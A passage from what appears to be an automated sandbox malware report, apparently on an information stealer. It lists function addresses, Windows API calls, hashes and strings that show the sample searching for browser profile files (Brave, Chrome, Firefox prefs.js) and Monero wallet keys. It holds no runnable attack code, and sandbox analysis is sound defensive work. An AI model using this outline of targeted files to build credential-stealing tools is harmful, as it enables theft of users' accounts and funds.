                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00650B32,00650B2B,00000000,?,?,?,006513F4,00650B2A), ref: 0063BEF5
                    • StrCmpCA.SHLWAPI(?,006513F8), ref: 0063BF4D
                    • StrCmpCA.SHLWAPI(?,006513FC), ref: 0063BF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063C7BF
                    • FindClose.KERNEL32(000000FF), ref: 0063C7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: b92ae7ec32c53b3badbc6841967d3cd8e013ea74d9896caea1ec06b594eff096
                    • Instruction ID: 87214b060832845820235d87b0157055c42cece1062475e5868ae954a3f085c9
                    • Opcode Fuzzy Hash: b92ae7ec32c53b3badbc6841967d3cd8e013ea74d9896caea1ec06b594eff096
                    • Instruction Fuzzy Hash: D3427372950104BBEB54FBB0DC96EED737EAF94300F40455CB90AA6181EE349B49CBA6
                    Function 00644910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 0064492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00644943
                    • StrCmpCA.SHLWAPI(?,00650FDC), ref: 00644971
                    • StrCmpCA.SHLWAPI(?,00650FE0), ref: 00644987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00644B7D
                    • FindClose.KERNEL32(000000FF), ref: 00644B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: 2062646d6c626bfee2dc7c6cb47957f4f69408d4b8d9466979f902d041c437b8
                    • Instruction ID: 627aeec43b6d1ed737be0b25d8d8db195d0e5e7780e0c86160ac0ab2d4de9f5a
                    • Opcode Fuzzy Hash: 2062646d6c626bfee2dc7c6cb47957f4f69408d4b8d9466979f902d041c437b8
                    • Instruction Fuzzy Hash: C56143B2900218ABDB24EBA0DC49FEE737DBB98701F044598B50D96145EF71DB89CF92
                    Function 00644570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00644580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00644587
                    • wsprintfA.USER32 ref: 006445A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 006445BD
                    • StrCmpCA.SHLWAPI(?,00650FC4), ref: 006445EB
                    • StrCmpCA.SHLWAPI(?,00650FC8), ref: 00644601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0064468B
                    • FindClose.KERNEL32(000000FF), ref: 006446A0
                    • lstrcat.KERNEL32(?,01450700), ref: 006446C5
                    • lstrcat.KERNEL32(?,0144E820), ref: 006446D8
                    • lstrlen.KERNEL32(?), ref: 006446E5
                    • lstrlen.KERNEL32(?), ref: 006446F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 671575355-2848263008
                    • Opcode ID: 4e36684cef5cb406ab54c2792b0e406eda2f882628e02453229832c93c44e2e6
                    • Instruction ID: e89797f1f58e35113e53832755aa27415a67a8572d30c7bea75ac09437a0ec38
                    • Opcode Fuzzy Hash: 4e36684cef5cb406ab54c2792b0e406eda2f882628e02453229832c93c44e2e6
                    • Instruction Fuzzy Hash: 965133B2540218ABC764EB70DC89FED737DBB94300F404598B64D96194EF74DB858F92
                    Function 00643EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 00643EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 00643EDA
                    • StrCmpCA.SHLWAPI(?,00650FAC), ref: 00643F08
                    • StrCmpCA.SHLWAPI(?,00650FB0), ref: 00643F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0064406C
                    • FindClose.KERNEL32(000000FF), ref: 00644081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: d270029e71cf40fd46035ac7337dce51cfe7b339c2f52cb13c96ab5703e70edb
                    • Instruction ID: 1842ab588d280aa4296f04f47853f410b46541e4d88a9cc949c468daedc8b518
                    • Opcode Fuzzy Hash: d270029e71cf40fd46035ac7337dce51cfe7b339c2f52cb13c96ab5703e70edb
                    • Instruction Fuzzy Hash: 1D5165B2900218ABCB24FBB0DC89EEE737DBB84300F04459CB65D96144DB75DB898F95
                    Function 0063ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 0063ED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 0063ED55
                    • StrCmpCA.SHLWAPI(?,00651538), ref: 0063EDAB
                    • StrCmpCA.SHLWAPI(?,0065153C), ref: 0063EDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063F2AE
                    • FindClose.KERNEL32(000000FF), ref: 0063F2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: b80b862158154d8c6b9ce750ce327cc8efafd80b5ee7969fdb262e2dd699ffee
                    • Instruction ID: cbb19e03ddc49f7fe57479f3b2cdcafa2518a09fcf2f041e4137db9e0859bed9
                    • Opcode Fuzzy Hash: b80b862158154d8c6b9ce750ce327cc8efafd80b5ee7969fdb262e2dd699ffee
                    • Instruction Fuzzy Hash: D6E1E471951118BAFB94FBA0DC52EEE733AEF55300F41459DB40A62092EE306F8ACF95
                    Function 0063F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006515B8,00650D96), ref: 0063F71E
                    • StrCmpCA.SHLWAPI(?,006515BC), ref: 0063F76F
                    • StrCmpCA.SHLWAPI(?,006515C0), ref: 0063F785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063FAB1
                    • FindClose.KERNEL32(000000FF), ref: 0063FAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: fea76e658e1e7a969efa6c6aea8e338b197abb67f69aee44472992c5850d04eb
                    • Instruction ID: 9703b0b2b453680bc236acb9f17aefbcd69473201947a1f447797d1621d3fc90
                    • Opcode Fuzzy Hash: fea76e658e1e7a969efa6c6aea8e338b197abb67f69aee44472992c5850d04eb
                    • Instruction Fuzzy Hash: E5B13571940108AFDB64FFA0DC56BEE737AAF95300F4085ACA40A96191EF309B49CF96
                    Function 006316D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0065510C,?,?,?,006551B4,?,?,00000000,?,00000000), ref: 00631923
                    • StrCmpCA.SHLWAPI(?,0065525C), ref: 00631973
                    • StrCmpCA.SHLWAPI(?,00655304), ref: 00631989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00631D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00631DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00631E20
                    • FindClose.KERNEL32(000000FF), ref: 00631E32
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: 190f40d228e1a6ce7d27e7aa95888db5adab876ad39bda3a0ad71b10fcf7db05
                    • Instruction ID: 66b38383483ce25ecb10308d05766b4c572aef99fe45be3393ce99cbf22b0649
                    • Opcode Fuzzy Hash: 190f40d228e1a6ce7d27e7aa95888db5adab876ad39bda3a0ad71b10fcf7db05
                    • Instruction Fuzzy Hash: A5127F71851118BBEB59FBA0CC96EEE733AAF55300F41419DB50A62091EF306F89CFA5
                    Function 0063DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00650C2E), ref: 0063DE5E
                    • StrCmpCA.SHLWAPI(?,006514C8), ref: 0063DEAE
                    • StrCmpCA.SHLWAPI(?,006514CC), ref: 0063DEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063E3E0
                    • FindClose.KERNEL32(000000FF), ref: 0063E3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: 3f7403b940c6f3ea2eb04b240ee64b0747480b76f2144218075abdba3d181cbf
                    • Instruction ID: 019105930a5780859ef9148e71a6ea87fb5f8279d65b5d42d57046779b1ae679
                    • Opcode Fuzzy Hash: 3f7403b940c6f3ea2eb04b240ee64b0747480b76f2144218075abdba3d181cbf
                    • Instruction Fuzzy Hash: F3F1E071854118AEEB59EBA0CC95EEE733AFF55300F4141DDA40A62091EF306F8ACF66
                    Function 0063DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                      • Part of subcall function 0064A920: lstrcpy.KERNEL32(00000000,?), ref: 0064A972
                      • Part of subcall function 0064A920: lstrcat.KERNEL32(00000000), ref: 0064A982
                      • Part of subcall function 0064A9B0: lstrlen.KERNEL32(?,01449E88,?,\Monero\wallet.keys,00650E17), ref: 0064A9C5
                      • Part of subcall function 0064A9B0: lstrcpy.KERNEL32(00000000), ref: 0064AA04
                      • Part of subcall function 0064A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0064AA12
                      • Part of subcall function 0064A8A0: lstrcpy.KERNEL32(?,00650E17), ref: 0064A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006514B0,00650C2A), ref: 0063DAEB
                    • StrCmpCA.SHLWAPI(?,006514B4), ref: 0063DB33
                    • StrCmpCA.SHLWAPI(?,006514B8), ref: 0063DB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0063DDCC
                    • FindClose.KERNEL32(000000FF), ref: 0063DDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                    • Associated: 00000000.00000002.1786611949.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.00000000006ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.0000000000712000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786637155.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.000000000088E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000A17000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000AEC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B14000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1786788624.0000000000B2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787053492.0000000000B2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787166219.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1787183804.0000000000CCA000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_630000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: d3e7f3fc3b20e2eac8c0d4420e6767957013d92e61efdb9e5d3a35ee049f9e99
                    • Instruction ID: 64baf465ba31d846a4b7aa91f9796b483608312ec28b5c2d419c8b71e84d8ac0
                    • Opcode Fuzzy Hash: d3e7f3fc3b20e2eac8c0d4420e6767957013d92e61efdb9e5d3a35ee049f9e99
                    • Instruction Fuzzy Hash: B49150B6900104ABDB54FBB0EC569ED737FAF85300F41866CF80A96181EE34DB498BD6
                    Function 00647B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0064A740: lstrcpy.KERNEL32(00650E17,00000000), ref: 0064A788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,006505AF), ref: 00647BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00647BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00647C0D
